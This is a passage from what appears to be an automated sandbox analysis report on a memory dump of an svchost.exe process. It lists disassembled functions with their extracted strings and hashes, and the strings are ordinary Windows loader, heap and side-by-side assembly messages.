                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02EA2506
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 02EA2602
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 02EA24C0
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 02EA2412
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 02EA2624
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02EA2498
                                                                    • @, xrefs: 02EA259B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    • Opcode ID: b8d35eef9ea25cf45204ebf9cba8ea9498fb90d66372175bd91687867c0c51f7
                                                                    • Instruction ID: a40924d16ba89fce471d6dcef71b5b7911fbf5714a2f7ada25f940a27aa4cdc2
                                                                    • Opcode Fuzzy Hash: b8d35eef9ea25cf45204ebf9cba8ea9498fb90d66372175bd91687867c0c51f7
                                                                    • Instruction Fuzzy Hash: 140252B1D802299FDB21DB14CC54BEAB7B9AF44744F00A1E9EB09B7241D770AE84CF59
                                                                    Function 02E60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                    • API String ID: 0-360209818
                                                                    • Opcode ID: 6b2e45fb0d92efa9c89a3cc13febec60ccb153afdaaea9973242645751f7b008
                                                                    • Instruction ID: fd2a069ce62a9a538e57506914613414abfbbeb5595b9db89a394c9f5a75a2ff
                                                                    • Opcode Fuzzy Hash: 6b2e45fb0d92efa9c89a3cc13febec60ccb153afdaaea9973242645751f7b008
                                                                    • Instruction Fuzzy Hash: B0629EB1E802298FDB24CF18C8547A9B7B6AF95318F54D2DAE44DAF240D7326AD1CF50
                                                                    Function 02ED8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    • Opcode ID: fa3e60fb94756031d7624d4aa0965ee8f860cb897118859adadb60b0bef302f5
                                                                    • Instruction ID: 00046b0be62107bdd198c6cedb6db428033d4d333c5201f6874843be2c6dabce
                                                                    • Opcode Fuzzy Hash: fa3e60fb94756031d7624d4aa0965ee8f860cb897118859adadb60b0bef302f5
                                                                    • Instruction Fuzzy Hash: 1551CF716853519BD325CF188984BABB7ECEF85348F14A91DB89583280E770E547CBA2
                                                                    Function 02EE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                    • API String ID: 0-3591852110
                                                                    • Opcode ID: d6b720bf755631b8d5cebffa4d91e9560d76e05682841be935c30a0e3b4b249f
                                                                    • Instruction ID: d44daed4a21a4b2b3e8fc946867238fa88938014f0f872228bc7d399824cbbae
                                                                    • Opcode Fuzzy Hash: d6b720bf755631b8d5cebffa4d91e9560d76e05682841be935c30a0e3b4b249f
                                                                    • Instruction Fuzzy Hash: E2127A706806429FDB259F28C485BBAB7F2FF09718F18E459E49B8B681D734EC85CB50
                                                                    Function 02E4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    • Opcode ID: 117f48c3d2d9f8096f8aec28f2440b82a3e58ef6df536a1404bd818067c2900d
                                                                    • Instruction ID: 9acfcbdd77276520700616b6e2122420d75deb94d083538b7f29e01f7cddc386
                                                                    • Opcode Fuzzy Hash: 117f48c3d2d9f8096f8aec28f2440b82a3e58ef6df536a1404bd818067c2900d
                                                                    • Instruction Fuzzy Hash: E1121471AC8341CBD724DF14D450BAAB3E5BF85758F04AA2EF9858B390EB34E944CB52
                                                                    Function 02E2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                    • API String ID: 0-3532704233
                                                                    • Opcode ID: dd8168deafe72dcf66cf25da95a4dda37600ff5da2f9118a2f5b60d7da9f53a6
                                                                    • Instruction ID: 9d32ba44b681644ffb58f7f342ebae38ad5c71b6cb3c12edc3c33f6fd081888e
                                                                    • Opcode Fuzzy Hash: dd8168deafe72dcf66cf25da95a4dda37600ff5da2f9118a2f5b60d7da9f53a6
                                                                    • Instruction Fuzzy Hash: C8B1AF715883659FC711DF24C880B6BB7E8BB84748F01A92EFA8AD7240D770D948CB92
                                                                    Function 02EE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    • Opcode ID: b7fe058ae53c0d2dbfd956209135146e6713caec9d5e890dff2545e96394cf07
                                                                    • Instruction ID: b9ad4bf9ab252f6bc499e09a3461001e57dc6dcb65d73c69463ad05b65a4d889
                                                                    • Opcode Fuzzy Hash: b7fe058ae53c0d2dbfd956209135146e6713caec9d5e890dff2545e96394cf07
                                                                    • Instruction Fuzzy Hash: 94F1CC31A80695EFDF25DB68C480BAAB7F5FF09308F04E059E487AB251C774A989CF51
                                                                    Function 02EE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    • Opcode ID: c7840e608fd51cd415dad2bf5f8ae37193b33f29085065c08397bc446c5d7c48
                                                                    • Instruction ID: daba4ab6c7cc69dde7fe10d851ca1437884cece2d383f209cc3f63bf84429bbc
                                                                    • Opcode Fuzzy Hash: c7840e608fd51cd415dad2bf5f8ae37193b33f29085065c08397bc446c5d7c48
                                                                    • Instruction Fuzzy Hash: 09D1CD71980695DFDF22DF68C440AA9BBF2FF4A718F08E049E447AB651C7B49985CF10
                                                                    Function 02EB89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • VerifierDebug, xrefs: 02EB8CA5
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 02EB8B8F
                                                                    • HandleTraces, xrefs: 02EB8C8F
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 02EB8A3D
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 02EB8A67
                                                                    • VerifierFlags, xrefs: 02EB8C50
                                                                    • VerifierDlls, xrefs: 02EB8CBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    • Opcode ID: 08240fcce6475c2634a6c266693df983f465c00042431d0f1d0fc2cb195944a8
                                                                    • Instruction ID: dfcd2d101c2a48454ec39e9ada0263a5899982822bd6ed90243416881953df38
                                                                    • Opcode Fuzzy Hash: 08240fcce6475c2634a6c266693df983f465c00042431d0f1d0fc2cb195944a8
                                                                    • Instruction Fuzzy Hash: EC914471AC13159BD726DF288890BEBB3ADAF42758F45E859FA456B380C7709C08CF91
                                                                    Function 02E3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    • Opcode ID: 293410d216013f7a2ac5aff7077be9cc130eb03b1e0bfbab60b38f7fc4ea71fb
                                                                    • Instruction ID: a9d675a2baba3a6520e2f774900383024a1b7fe24ce528fcdc6503de0666e443
                                                                    • Opcode Fuzzy Hash: 293410d216013f7a2ac5aff7077be9cc130eb03b1e0bfbab60b38f7fc4ea71fb
                                                                    • Instruction Fuzzy Hash: 7DA24970E456698FDF65DF19CC887A9B7B1AF45309F1492EAD80DA7290DB309E81CF40
                                                                    Function 02E2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-523794902
                                                                    • Opcode ID: 199d56e0d691921fe567cf5415e14e0a863a41b3d9ed6cfc492da02b94a05dbf
                                                                    • Instruction ID: 580b9d2fdae06b1a50126be0796a96e00c6fe3642f9c13a2cfedef2e24f54ab1
                                                                    • Opcode Fuzzy Hash: 199d56e0d691921fe567cf5415e14e0a863a41b3d9ed6cfc492da02b94a05dbf
                                                                    • Instruction Fuzzy Hash: F042EF312846918FD715DF28C880B6AB7E6FF85308F18E96DF48A8B651DB34D849CB52
                                                                    Function 02E3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    • API String ID: 0-4098886588
                                                                    • Opcode ID: 3ad43d2cac90ce854df1948415a7fc7f187276f7845ccb96381fd0a966295644
                                                                    • Instruction ID: 16805b69e44541c3608835ca2299595b2633d4be2c91dae366d50ab4008f9311
                                                                    • Opcode Fuzzy Hash: 3ad43d2cac90ce854df1948415a7fc7f187276f7845ccb96381fd0a966295644
                                                                    • Instruction Fuzzy Hash: 6632A371980269CBDF22CB14C858BEEB7B5BF45349F10A1EAE84AA7250D7719EC1CF50
                                                                    Function 02E4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-122214566
                                                                    • Opcode ID: 2e79e893a4e3529bec3e780f177c2b371a6acaf9d74f927e49f03d459486e2cb
                                                                    • Instruction ID: 1d65b2a26bcb6e9e9de515fcfcd2e2cd1741a56f0a18eb3c4ed2a8316f635781
                                                                    • Opcode Fuzzy Hash: 2e79e893a4e3529bec3e780f177c2b371a6acaf9d74f927e49f03d459486e2cb
                                                                    • Instruction Fuzzy Hash: 5FC14831E802159BDF24CB65D880BBEB7A5AF4630CF14E06EEC069B291EFB4D845C791
                                                                    Function 02E663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: fbdc7c5ac4eeba8f704cd5510c45f9e5d1e673371a0fa9d726442e6995d0b0e1
                                                                    • Instruction ID: 3765ee2bcfe0c69b9716171f59f5eab96666ddfb8d70b4b7c6c61840281034d3
                                                                    • Opcode Fuzzy Hash: fbdc7c5ac4eeba8f704cd5510c45f9e5d1e673371a0fa9d726442e6995d0b0e1
                                                                    • Instruction Fuzzy Hash: F2915A70EC03189BEB28DF14D859BBA77A5FF41798F40E428E9056F6C0D7B4A801CBA0
                                                                    Function 02E2645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02E899ED
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02E89A01
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E89A11, 02E89A3A
                                                                    • apphelp.dll, xrefs: 02E26496
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02E89A2A
                                                                    • LdrpInitShimEngine, xrefs: 02E899F4, 02E89A07, 02E89A30
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-204845295
                                                                    • Opcode ID: 036a708aced3a4cc4dc063cf36317c296095cf545758b80626ca3ee09510eae7
                                                                    • Instruction ID: 7ccda8be7e0e37e55149f1b9a5ae4ee5356fd265c964ed72729978dd9c1dfc88
                                                                    • Opcode Fuzzy Hash: 036a708aced3a4cc4dc063cf36317c296095cf545758b80626ca3ee09510eae7
                                                                    • Instruction Fuzzy Hash: 2C510B716C83149FE724EF24C881BAB77E9FB84744F409D59F98A97291D730E908CB92
                                                                    Function 02E6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpInitializeImportRedirection, xrefs: 02EA8177, 02EA81EB
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02EA8181, 02EA81F5
                                                                    • LdrpInitializeProcess, xrefs: 02E6C6C4
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E6C6C3
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 02EA81E5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 02EA8170
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-475462383
                                                                    • Opcode ID: 803edcbe512b595f9c155d7f092d81d40c2469e8828df00b4f51fae07a3dc1a7
                                                                    • Instruction ID: 7e997125801ddba5cba41a2f4715a8f7f19c185163152fb863f0cb19e2be06c8
                                                                    • Opcode Fuzzy Hash: 803edcbe512b595f9c155d7f092d81d40c2469e8828df00b4f51fae07a3dc1a7
                                                                    • Instruction Fuzzy Hash: F83139717C43459FD214EF28DC49E2BB7A5EF80B58F04A9A8FC855B291D720EC04CBA2
                                                                    Function 02E62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02EA2178
                                                                    • SXS: %s() passed the empty activation context, xrefs: 02EA2165
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02EA21BF
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02EA219F
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02EA2180
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 02EA2160, 02EA219A, 02EA21BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    • API String ID: 0-861424205
                                                                    • Opcode ID: 6fb3b2e8156807195d924b01dd08c0941a7d539df2cc712730dd15c0ff266423
                                                                    • Instruction ID: 8b17c0282aac17996147797ae05f37ad687ad95337f273913033374b0ad197ab
                                                                    • Opcode Fuzzy Hash: 6fb3b2e8156807195d924b01dd08c0941a7d539df2cc712730dd15c0ff266423
                                                                    • Instruction Fuzzy Hash: BD31D432EC022467FB218A958C55FABB769DFA4B98F05E069BF057B140D370AE00C6E1
                                                                    Function 02E49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                    • API String ID: 0-3393094623
                                                                    • Opcode ID: 9d1c0543d36e91e57a49b0d491456744b51d18ba88766bac72e8880ef4de6bb3
                                                                    • Instruction ID: 77dfc8e72ffabb7e12291efc72f55223e31fd4b6de8e31e09c10a78d64ef2857
                                                                    • Opcode Fuzzy Hash: 9d1c0543d36e91e57a49b0d491456744b51d18ba88766bac72e8880ef4de6bb3
                                                                    • Instruction Fuzzy Hash: B1028D71588341CFD720CF64D184BABB7E5BF84748F40E91EE989AB252DB70D948CB92
                                                                    Function 02E7096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02E72DF0: LdrInitializeThunk.NTDLL ref: 02E72DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 357d34c4940ac10fa625930ac08a2441fc67bc3bf3e8afac115ea19936cdc7a7
                                                                    • Instruction ID: a3113d27fca8fe09741fb51996d513a7e09bce9baee488469f75c4f101b15c48
                                                                    • Opcode Fuzzy Hash: 357d34c4940ac10fa625930ac08a2441fc67bc3bf3e8afac115ea19936cdc7a7
                                                                    • Instruction Fuzzy Hash: FF426A71940715DFDB20CF24C890BAAB7F5FF44304F1495AAE989EB242E770AA84CF60
                                                                    Function 02EB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    • API String ID: 0-2518169356
                                                                    • Opcode ID: 8c05d1c4668f9d5dfeeef2432b8e1a65f5ec5b6c603538f525806d3989f653b9
                                                                    • Instruction ID: 08d41552eecf18ea3349ecd50b3b871add973b02f8706144b63d442e5d8f3267
                                                                    • Opcode Fuzzy Hash: 8c05d1c4668f9d5dfeeef2432b8e1a65f5ec5b6c603538f525806d3989f653b9
                                                                    • Instruction Fuzzy Hash: 9591C072D40A19DBCB22CFA9C880AEFB7B1EF49314F999169E815E7390D735D901CB90
                                                                    Function 02E470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: cb30099d282e75e3a66061578f89011db9dc9830d70198321133ed7d8aa75de7
                                                                    • Instruction ID: d5435aaa8a3b7328e284fafcb104a7c462e55d385f867f39ba6c49fae12b0c73
                                                                    • Opcode Fuzzy Hash: cb30099d282e75e3a66061578f89011db9dc9830d70198321133ed7d8aa75de7
                                                                    • Instruction Fuzzy Hash: D8138C70A40655CFDB25CF68D8907A9FBF2BF49308F14D1A9E849AB381DB34A945CF90
                                                                    Function 02E4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SsHd, xrefs: 02E4A885
                                                                    • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02E97D03
                                                                    • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02E97D39
                                                                    • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02E97D56
                                                                    Memory Dump Source
